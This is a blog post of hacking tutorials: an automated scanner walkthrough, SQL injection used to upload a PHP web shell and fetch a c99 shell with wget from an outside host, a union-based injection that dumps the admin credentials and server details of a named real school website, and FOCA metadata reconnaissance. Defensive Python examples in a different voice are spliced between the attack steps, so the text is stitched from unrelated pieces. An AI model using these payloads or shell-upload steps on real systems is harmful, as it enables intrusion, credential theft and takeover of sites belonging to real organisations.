Wednesday 12 November 2014

Hack a website using WebCruiser

[*]Introduction

Welcome to my step by step tutorial on how to hack a website using WebCruiser Scanner.

As always I will try to explain it in the easiest way, so it will be n00b friendly.

I suggest you practice "hacking" manually, as using tools won't improve your skills.

Still, there are lazy guys :P who prefer to perform these attacks with tools.

OK, first of all we need to download WebCruiser Scanner.

Download it here!

Note: If you need a serial code for the program, leave a comment here and I will generate one for you with your nickname. DO NOT PM ME.

_____________________________


[*]Let's start:
You will need a target; you can use Google dorks to find vulnerable websites.

I won't go into that part, as there are billions of Google dorks out there.

OK, I found my vulnerable website:

Code:
http://www.target.com/vmarket.php?id=17

Let's open WebCruiser Scanner and check the target for vulnerabilities, as in the picture below:




Then click Scan Site.



Now we wait a minute or two, depending on your internet connection speed, for the scan to finish; then we will see results like the image below.



As we can see, the website is vulnerable to SQL injection & XSS.

We will perform a SQL injection this time.

[*]Attack
Right-click on the vulnerable URL and then SQL INJECTION POC; now you
just need to follow the steps below.

I have explained step by step with pictures so it will be easier for you to understand.








So that's all guys, we got the admin info in just 5 minutes :>

HOW TO UPLOAD SHELL THROUGH SQL INJECTION

First of all, find a website which is vulnerable to SQL injection; you can find websites by dorks or manually XD, like I have found this one.
You need 2 main things:
1) Root path of the website
2) A writable directory
If the vulnerable website doesn't show the root path, don't worry, I will tell you how to find the root path. :D
And also a writable directory.

www.site.com/index.php?id=10'


I am not starting with the ABC of SQLi; I hope you know the basics :D
Now we have to find the columns of the website, then the vulnerable columns; my site has 5 columns and 3 is the vulnerable column.

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5--

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5--

Let's Try To Load Files Of The Website

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/passwd'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/my.cnf'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/group'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/services'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/hosts'),4,5--

We won't need to read any of the files mentioned above; they are just to increase your knowledge :D
Now we have to check the file privilege for the current user; for this you first have to find the current username.
Like this:

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5--

Our current username is shown; mine is Ch3rn0by1.
Now check the file privileges for user Ch3rn0by1:

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user='Ch3rn0by1'--

If it shows Y (yes) in the vulnerable column of the website, that means we have file privileges for the current user Ch3rn0by1.
And if it doesn't show Y, then don't waste your time there :D

OK, now we have to find the root path :D. For this we have to know the software which is used on the server;
you can use Havij, /etc/passwd and many more softwares (/etc/passwd isn't a software LOL).
To find the server software from the file /etc/passwd, use this query:

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file('etc/passwd'),5--

now we have our server software, e.g. (/home/Ch3rn0by1)
now read one more file.

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('etc/Ch3rn0by1.conf'),4,5--

Where Ch3rn0by1 is your server software name, like servername.conf :D

now we have the root path

/home/site.com/public_html etc.

Now we have to find a writable directory; for this you can use Google dorks as well as your own knowledge :D

site www.site.com/dir/*/*/*/*/

so it's site.com/ch3rn0by1/writeable

now we will upload our evil code

www.site.com/index.php?id=10 UniOn SeleCt 1,2,"<?system($_REQUEST['cmd']);?>",4,5 into outfile '/home/site/public_html/Ch3rn0by1/writeable directory/Ch3rn0by1.php'--+
OK, now we have to execute our commands:
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=pwd
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=uname -a

Now we will use the wget command to upload our evil script:

www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=wget http://www.shellsite.com/c99.txt

Now we will rename our c99.txt to .php in order to execute it :D

www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=mv c99.txt c99.php

now open it:

www.site.com/Ch3rn0by1/writeable directory/c99.php VOILA, OUR SHELL IS LIVE :D

Sqli Dorking Script In Perl

USE: sqliDorking.pl [-gd/-bd] -p [-l Links.txt]  [-f Logs.txt]

Options:
  -gd : Google Dork
  -bd : Bing Dork
  -l : File with links to analyze
  -p : Number of pages to search
  -f : File where the logs will be saved

Example usage:
sqliDorking.pl -gd inurl:product.php?id= -p 3 -f VulneSQL.txt
sqliDorking.pl -l links.txt -f VulneSQL.txt
sqliDorking.pl -bd inurl:product.php?id= -p 3
sqliDorking.pl -l links.txt

Download SQLi Dorking ===> http://sourceforge.net/projects/sqlidorking/

Tutorial SQL Injection Union Based with Screens



0x00FFF#~ Summary
0x1 - Introduction
0x2 - Attack
0x3 - Links
0x4 - Credits & Authors


0x1#~ Introduction

# What is SQL Injection?
A SQL injection attack consists of the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), and execute administration operations on the database.

[?] Info:
- It's a flaw in the web application, not the database or the server.
- Can be injected into: Cookies, Forms, and URL parameters.

(What are Cookies ? http://en.wikipedia.org/wiki/HTTP_cookie)

# Why UNION?
The UNION operator is used in SQL injections to join a query, purposely forged by the tester, to the original query. The result of the forged query will be joined to the result of the original query, allowing the tester to obtain the values of columns of other tables.
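To show from the application side why the forged UNION lands, here is an added example that is not from this tutorial: the vulnerable "?id=" lookup beside a parameterised version, with an in-memory SQLite database standing in for MySQL. The schema, rows and function names are constructed; the table and column names echo the login_admin table dumped later in the tutorial.

```python
import sqlite3

# Added example: the vulnerable "?id=" pattern beside its hardened form.
# SQLite stands in for MySQL; the schema and rows below are constructed,
# with table and column names borrowed from the tutorial's target.


def build_db():
    """Create an in-memory database with an article table the page serves by id
    and a separate login_admin table that the injected UNION reaches for."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE article (id INTEGER, title TEXT, body TEXT);
        INSERT INTO article VALUES (92, 'Welcome', 'Hello');
        CREATE TABLE login_admin (admin_id INTEGER, usernme TEXT, passwrd TEXT);
        INSERT INTO login_admin VALUES (1, 'admin', 'hash-placeholder');
        """
    )
    return db


def fetch_article_vulnerable(db, raw_id):
    """Vulnerable: the id parameter is pasted into the SQL text, so everything
    the client appends ("and 0 UNION SELECT ...") is parsed as SQL."""
    sql = "SELECT id, title, body FROM article WHERE id=" + raw_id
    return db.execute(sql).fetchall()


def fetch_article_safe(db, raw_id):
    """Hardened: validate the type first, then bind the value as a parameter.
    A bound value is never parsed as SQL, so a UNION inside it cannot run."""
    try:
        id_value = int(raw_id)
    except (TypeError, ValueError):
        return []  # reject (and log) the request in a real application
    sql = "SELECT id, title, body FROM article WHERE id=?"
    return db.execute(sql, (id_value,)).fetchall()


# The tutorial's payload shape: "and 0" suppresses the real row, the UNION
# with a matching column count (3 here, 9 on the tutorial's target) appends
# rows from another table, and "--" comments out whatever the application
# would have added after the parameter.
PAYLOAD = "92 and 0 UNION SELECT admin_id, usernme, passwrd FROM login_admin--"

if __name__ == "__main__":
    db = build_db()
    print("normal request, vulnerable code :", fetch_article_vulnerable(db, "92"))
    print("payload, vulnerable code        :", fetch_article_vulnerable(db, PAYLOAD))
    print("normal request, hardened code   :", fetch_article_safe(db, "92"))
    print("payload, hardened code          :", fetch_article_safe(db, PAYLOAD))
```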

0x2#~ Attack

# Here is a list of d0rks to find SQL vulnerabilities:
A lot of these sites have already been hacked by other hackers, but it's useful for training!

#------------------------------------------------------------------------------------+
| I have found a vulnerable website; I am not responsible for your damage.
| I prefer to make a tutorial on a real site, to be in a real situation.
#------------------------------------------------------------------------------------+

#[1] Find the vulnerable parameter
Quote:
hxxp://dbhspgoa.edu.in/Article.php?id=92 (no error)
hxxp://dbhspgoa.edu.in/Article.php?id=92' (error)
"Why error? I don't see any error message???"
It's normal, in this case the error is the blank page:



#[2] Find the number of columns
To get to the point, what we're about to do is find how many columns the website has using No Error/Error statements.

Start by entering order by 100--
Quote:
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 100-- (error)
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 50-- (error)
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 15-- (error)
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 10-- (error)
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 9-- (no error)

The page displays correctly, so there are 9 columns:



#[3] Time to execute the UNION SELECT statement
We have to select the 9 columns:
Quote:
hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 union select 1,2,3,4,5,6,7,8,9--
Wow, the number 4 appears; the 4th column is vulnerable to SQL injection and we'll extract the database from here:



#[4] Information

Now that we know where to inject, you can gather some information about the database using concat(query()):

Examples:
- version()

Quote:
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,concat(version()),5,6,7,8,9--

- @@datadir

Quote:
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,@@datadir,5,6,7,8,9--

- @@hostname
Hmm I don't know why it doesn't work on this site

- database()

Quote:
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT+1,2,3,concat(database()),5,6,7,8,9--

- user()

Quote:
hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,concat(user()),5,6,7,8,9--

- show all

Quote:
hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(database(),0x3c62723e,version(),0x3c62723e,@@datadir,0x3c62723e,user()),5,6,7,8,9--
0x3c62723e = <br> converted to hex (3c62723e), with the 0x prefix so the database reads it as a string literal


First, let's look at some functions we're going to use to extract table names (important):
Quote:
group_concat = groups data up into one result for a specific statement
table_name = table names to be shown on screen
from = location of a specified statement
information_schema.tables = information in the database with the table names in it
table_schema = tables in a database
database() = the current database of the website
0x0a = a hex code that creates a new line, for listing the tables in order

#[5] Show all tables of the database
I apply the functions I mentioned:
Quote:
hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(table_name,0x0a),5,6,7,8,9 from information_schema.tables where table_schema=database()--

You should see this:
Code:
allumni ,article ,attendance_setting ,banner ,banner_zone ,content ,course ,csv ,division ,events ,ex_student ,exam_desc ,exam_setting ,exam_subjtotal ,exam_type ,final_grading ,grace ,grade_subject ,grading ,groups ,lecture_attendance ,login ,login_admin ,magazines ,mrksht ,navigation ,news ,notice ,photo_category ,photo_details ,pictures ,school_accnt ,schooldays_total ,semester ,standard ,standard_desc ,stream_desc ,stud_history ,stud_score ,student ,student_admission ,student_attendance ,student_exam ,student_grace ,student_grade ,student_gradesubject ,student_subject ,student_ya ,student_yrassessment ,subject ,tags ,tb_excelupload ,tb_quicklinks ,tb_videos ,teacher ,teacher_classes ,teacher_sub_assign ,teacher_subjects ,template ,thoughtforday ,year_assessment ,year_desc

Wow, there are two interesting tables: login and login_admin! Hmm, "admin", I love this kind of table.



#[6] Extract data from columns

'login' seems to have user information stored in it.
'login_admin' seems to have admin information stored in it.

To do this, we're gonna have to alter some queries a bit. Look closely at this syntax:
Quote:
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(column_name,0x0a),5,6,7,8,9 from information_schema.columns where table_name=0x6c6f67696e5f61646d696e--

We need to replace:
table_name = replaced by "column_name"
information_schema.tables = replaced by "information_schema.columns"
table_schema = replaced by "table_name"
database() = replaced by "0x6c6f67696e5f61646d696e--" (login_admin in hex)

To make a hex value readable to the database, we put "0x" at the beginning. To query that table using the syntax above, we have to convert the table name to hex. If you are using the Firefox HackBar like me, you can do that:



And the result will be: 0x44616973756b65a



Or: http://www.string-functions.com/hex-string.aspx

So! After launching the injection on the table login_admin, we have 4 columns: admin_id, usernme, passwrd, logtime



Let's look at the functions we replaced and their uses.
Quote:
group_concat(column_name,0x0a) = grouping the column names we're going to extract
information_schema.columns = column names stored in database
table_name = extracting column from a specific table
0xHEX_Code_Table = Specific table name converted to hex

Results:
Quote:
hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(admin_id,0x0a,passwrd,0x0a,logtime,0x0a,usernme,0x0a),5,6,7,8,9 from login_admin--

It shows the admin credentials:
admin_id    passwrd    logtime    usernme
1    3¢PÉÜœz;þß„mJ…    2014-02-11 01:25:09    admin




You can try with the table that you want. I use the same injection for the table login:

Quote:
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(column_name,0x0a),5,6,7,8,9 from information_schema.columns where table_name=0x6c6f67696e--



Then

Quote:
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(a_id,0x0a,aname,0x0a,apass,0x3c62723e),5,6,7,8,9 from login--
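Every probe in steps [1] to [6] (the quote, ORDER BY, UNION SELECT against information_schema) and the load_file / INTO OUTFILE reads and writes from the shell-upload section above travel in the query string, so the web server's access log records them. The following is an added example, not part of this tutorial: a small Python scanner over constructed Common Log Format lines that flags those patterns and decodes the 0x hex literals the tutorial builds by hand. The indicator names, the documentation-range client addresses and the log lines are my own assumptions.

```python
import re
from urllib.parse import unquote_plus

# Added example, not part of the tutorial. Constructed access log lines: the
# client IPs are documentation addresses and the request shapes copy the
# tutorial's steps (quote probe, ORDER BY, UNION SELECT on information_schema,
# load_file). Sizes of 0 mirror the "blank page" error the tutorial relies on.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Nov/2014:10:01:02 +0000] "GET /Article.php?id=92 HTTP/1.1" 200 5120
203.0.113.5 - - [12/Nov/2014:10:01:09 +0000] "GET /Article.php?id=92%27 HTTP/1.1" 200 0
203.0.113.5 - - [12/Nov/2014:10:01:15 +0000] "GET /Article.php?id=92%20order%20by%2010-- HTTP/1.1" 200 0
203.0.113.5 - - [12/Nov/2014:10:02:30 +0000] "GET /Article.php?id=92%20and%200%20UNION%20SELECT%201,2,3,group_concat(column_name,0x0a),5,6,7,8,9%20from%20information_schema.columns%20where%20table_name=0x6c6f67696e5f61646d696e-- HTTP/1.1" 200 4311
203.0.113.5 - - [12/Nov/2014:10:03:01 +0000] "GET /index.php?id=-10%20UniOn%20SeleCt%201,2,load_file('/etc/passwd'),4,5-- HTTP/1.1" 200 2001
198.51.100.7 - - [12/Nov/2014:10:03:05 +0000] "GET /index.php?id=17 HTTP/1.1" 200 3990
"""

# Common Log Format: ip ident user [time] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators, matched case-insensitively on the URL-decoded query string so
# that mixed-case spellings such as "UniOn SeleCt" do not slip past.
INDICATORS = {
    "quote_probe": re.compile(r"=\d+'(\s|&|$)"),
    "column_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_read": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "file_write": re.compile(r"\binto\s+(out|dump)file\b", re.I),
}
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")


def decode_hex_literals(text):
    """Decode MySQL 0x... string literals so an analyst sees which table or
    separator was named, e.g. 0x6c6f67696e5f61646d696e -> 'login_admin'."""
    decoded = []
    for hexdigits in HEX_LITERAL.findall(text):
        if len(hexdigits) % 2:
            continue  # odd length: not a byte string
        try:
            decoded.append(bytes.fromhex(hexdigits).decode("utf-8"))
        except UnicodeDecodeError:
            decoded.append("<binary:%s>" % hexdigits)
    return decoded


def analyse_line(line):
    """Parse one log line; return a record with the indicators it triggers,
    or None when the line is not in Common Log Format."""
    match = LOG_RE.match(line)
    if not match:
        return None
    path, _, query = match.group("path").partition("?")
    decoded = unquote_plus(query)  # %20 and '+' both become spaces
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    return {
        "ip": match.group("ip"),
        "ts": match.group("ts"),
        "path": path,
        "status": int(match.group("status")),
        "size": int(match.group("size")),
        "indicators": hits,
        "hex_decoded": decode_hex_literals(decoded) if hits else [],
    }


def scan_log(text):
    """Return the records that triggered at least one indicator, in log order."""
    alerts = []
    for line in text.splitlines():
        record = analyse_line(line)
        if record and record["indicators"]:
            alerts.append(record)
    return alerts


def indicators_by_ip(alerts):
    """Group triggered indicators per client; one client walking
    quote -> ORDER BY -> UNION SELECT is the tutorial's sequence end to end."""
    grouped = {}
    for record in alerts:
        grouped.setdefault(record["ip"], set()).update(record["indicators"])
    return {ip: sorted(names) for ip, names in grouped.items()}


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ts"], alert["ip"], alert["path"], alert["indicators"], alert["hex_decoded"])
    print(indicators_by_ip(scan_log(SAMPLE_LOG)))
```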



The final dump
Code:
http://dbhspgoa.edu.in
goaed_ucation
5.0.37-standard
/var/lib/mysql/
goaed_ucationu@72.35.83.36


================Misc================
Apache 1.3.41
FrontPage/5.0.2.2510
Apache module mod_perl/1.29 FrontPage/5.0.2.2510
Mod SSL 2.8.31
Open SSL 0.9.8b
PHP 4.4.8


____________________________________________________________

0x3#~ Links
- http://hakipedia.com/index.php/SQL_Injection
- http://hex.online-toolz.com/tools/text-h...vertor.php
- https://www.owasp.org/index.php/XSS_Filt...heat_Sheet

0x4#~ Credits & Authors
Daisuke Dan - TheHackersBay
Penetration testing, Research Team

Have a nice day !

Simple SQLi Dumper v5.1 - Tool to find bugs, errors or vulnerabilities in MySQL database

SSDp is a useful penetration-testing tool to find bugs, errors or vulnerabilities in MySQL databases.

Functions
SQL Injection
Operation System Function
Dump Database
Extract Database Schema
Search Columns Name
Read File (read only)
Create File (read only)
Brute Table & Column
Download Simple SQLi Dumper v5.1 ===> http://rwinblog.comze.com/ssdp51/ssdp.pl

w3af - Open Source Web Application Security Scanner

w3af is a Web Application Attack and Audit Framework. The w3af core and its plugins are fully written in Python; it identifies more than 200 vulnerabilities and reduces your site's overall risk exposure. It identifies vulnerabilities like SQL injection, cross-site scripting, guessable credentials, unhandled application errors and PHP misconfigurations.

Changelog v1.6
Improved performance: your scans will run faster
Improved quality: 1300+ unittests are run after each change to make sure we don’t add any regressions
Now you’ll be able to easily integrate w3af into other projects with a simple import w3af
Better documentation

Download w3af ===> http://w3af.org/download

How to Hack: Extract Metadata from Websites Using FOCA

The preference for Linux as a hacking platform is well documented, and I have created a number of tutorials to train new hackers. Without being proficient in Linux, you can’t really call yourself a hacker. Sorry, that’s just how it is.
Every once in while, though, a hacking tool comes out for Windows that makes me stand up and take notice. For instance, Cain and Abel is an excellent tool for password cracking and MitM attacks and is only available on the Windows platform. I could name a few others, but only Havij, the excellent SQL injection tool, comes immediately to mind.
FOCA was released in 2009 and is now in version three. Although a Linux version is included in Kali, it is outdated. Let’s download the latest Windows version and use it here to perform some reconnaissance.
Good Reconnaissance Is Critical
FOCA is an excellent website reconnaissance tool with lots of interesting features and capabilities. Remember, before attacking any website or domain, it is critical to gather as much information as possible. From this information, you can determine the attack that is most likely to work against that site or network.
In this tutorial, we will be looking at FOCA's ability to find, download, and retrieve files from websites together with the files' metadata.
This metadata can give us insight into such information as the users (could be critical in cracking passwords), operating system (exploits are OS-specific), email addresses (possibly for social engineering), the software used (once again, exploits are OS-, and more and more often, application-specific), and if we are really lucky, passwords.
Step 1: Download FOCA for Windows
First, let’s download FOCA Free 3.0 for Windows.
Step 2: Choose Where You Save Results
When you install FOCA, you will be greeted with a screen like the one below. The first task is to start a new project and then tell FOCA where we want to save our results.


I created a new directory at c:\foca and will save all my results there. Of course, you can save your results wherever is convenient for you, or use the default temp directory.
Step 3: Create a Project
In this tutorial, I will be starting with a project named after the information security training company, SANS, which is located at sans.org, and I will be saving my results to c:\foca.


Step 4: Getting the Metadata
Once I create my project, I can go to the object explorer to the far left and select Metadata. This enables us to pull the metadata from the files on the website that contain metadata. Files such as .pdf, .doc, .xls, etc. all contain metadata that could be useful in your hack of your target.
When you select metadata, you will pull up a screen like that below. In our case here, we will be searching sans.org for .doc files, so the syntax to be placed in the search window is:
site:sans.org filetype:doc
This will search the entire sans.org website, looking for .doc files. When I hit the Search button next to the window, it will begin to search and find all the .doc files at sans.org.


Of course, if you were searching for .pdf files or other filetypes, you would put in that filetype. You can also search for multiple filetypes by listing them after filetype, such as:
site:sans.org filetype:pdf,doc,xls
Step 5: Download the Files
Once FOCA is done retrieving a list of all the .doc files, we can then right-click on any file and download the file to our hard drive, download all the files, or analyze the metadata. I chose to download all the .doc files I found at sans.org.


Step 6: Collect & Analyze the Metadata
Now that we have downloaded all the .doc files, I chose to analyze all the metadata in them. Microsoft’s Office files collect significant amounts of data as they are being created and edited that we can then extract.
When we expand the Metadata folder in the object explorer, you can see that we have 156 .doc files and 2 .docx files.


The Types of Metadata Collected
Just beneath the Metadata documents folder is another folder titled Metadata Summary. Clicking on it reveals the types of metadata it has collected from the files. This metadata is broken into eight (8) categories:
Users
Folders
Printers
Software
Emails
Operating Systems
Passwords
Servers
Let’s take a look at Users first. When we click on users, we can see that FOCA has collected the names of every user that worked on those files.


When we click on Software, we can see the various editions of Microsoft Office that have been used, including five (5) users that created their documents with Office '97 (hmm…wonder if there are any Office '97 vulnerabilities still out there?).


We can also look for email addresses that are embedded in the documents as displayed below. Obviously, these folks are making themselves available to a social engineering attack.


We can also gather printer, folder, passwords, and servers from this metadata depending upon the documents we recover. All of this information can then be used to determine what is the best attack against this organization/website.
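The Users, Software and Company fields that Steps 4 through 6 pull out of Office files live in two XML parts inside every .docx/.xlsx/.pptx package, docProps/core.xml and docProps/app.xml. The script below is an added example (not FOCA's code and not from the tutorial author): it builds a constructed sample document in memory, reports the same kind of summary FOCA shows, and then writes a scrubbed copy with the identifying properties removed, which is the check an organisation can run on its own documents before publishing them. The field names, namespace URIs and sample values are standard OOXML; the user names, company and version in the sample are made up.

```python
# Added example: audit and scrub Office (OOXML) document properties before publishing.
# Not FOCA's code; the document built below is constructed sample data.
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespaces used by docProps/core.xml and docProps/app.xml in .docx/.xlsx/.pptx packages
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",
}
for _prefix, _uri in NS.items():
    ET.register_namespace(_prefix, _uri)

# Properties that identify people, the organisation, or the exact software build
CORE_FIELDS = ("dc:creator", "cp:lastModifiedBy")
APP_FIELDS = ("ep:Company", "ep:AppVersion")


def build_sample_docx() -> bytes:
    """Constructed sample: a minimal .docx package carrying typical edit history."""
    core = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<cp:coreProperties xmlns:cp="{NS["cp"]}" xmlns:dc="{NS["dc"]}">'
        "<dc:title>Quarterly report</dc:title>"
        "<dc:creator>jdoe</dc:creator>"          # constructed user name
        "<cp:lastModifiedBy>asmith</cp:lastModifiedBy>"  # constructed user name
        "</cp:coreProperties>"
    )
    app = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Properties xmlns="{NS["ep"]}">'
        "<Application>Microsoft Office Word</Application>"
        "<AppVersion>16.0000</AppVersion>"
        "<Company>Example Corp</Company>"        # constructed company name
        "</Properties>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("docProps/core.xml", core)
        z.writestr("docProps/app.xml", app)
        z.writestr("word/document.xml", "<document/>")
    return buf.getvalue()


def _texts(root, tags):
    """Yield (tag, text) for each listed property that is present and non-empty."""
    for tag in tags:
        el = root.find(tag, NS)
        if el is not None and el.text and el.text.strip():
            yield tag, el.text.strip()


def extract_metadata(docx_bytes: bytes) -> dict:
    """Summarise what a recon tool would learn: user names, software build, company."""
    summary = {"users": set(), "software": set(), "company": None}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        names = set(z.namelist())
        if "docProps/core.xml" in names:
            root = ET.fromstring(z.read("docProps/core.xml"))
            for _, value in _texts(root, CORE_FIELDS):
                summary["users"].add(value)
        if "docProps/app.xml" in names:
            root = ET.fromstring(z.read("docProps/app.xml"))
            fields = dict(_texts(root, ("ep:Application", "ep:AppVersion", "ep:Company")))
            if "ep:Application" in fields:
                parts = (fields.get("ep:Application"), fields.get("ep:AppVersion"))
                summary["software"].add(" ".join(p for p in parts if p))
            summary["company"] = fields.get("ep:Company")
    return summary


def _drop(xml_bytes: bytes, tags) -> bytes:
    """Remove the listed property elements and re-serialise the part."""
    root = ET.fromstring(xml_bytes)
    for tag in tags:
        for el in root.findall(tag, NS):
            root.remove(el)
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)


def scrub_metadata(docx_bytes: bytes) -> bytes:
    """Return a copy of the package with identifying properties removed; all other parts are copied as-is."""
    src = zipfile.ZipFile(io.BytesIO(docx_bytes))
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == "docProps/core.xml":
                data = _drop(data, CORE_FIELDS)
            elif info.filename == "docProps/app.xml":
                data = _drop(data, APP_FIELDS)
            dst.writestr(info.filename, data)
    return out.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx()
    print("before:", extract_metadata(sample))
    print("after: ", extract_metadata(scrub_metadata(sample)))
```

Run it as a pre-publication check by pointing extract_metadata at the bytes of each document in a release folder; anything that shows up under users or company is what FOCA would show an outsider. The scrub keeps the Application name but drops AppVersion, since the exact Office build is what narrows an attacker's choice of document exploit, as the Office '97 remark above illustrates.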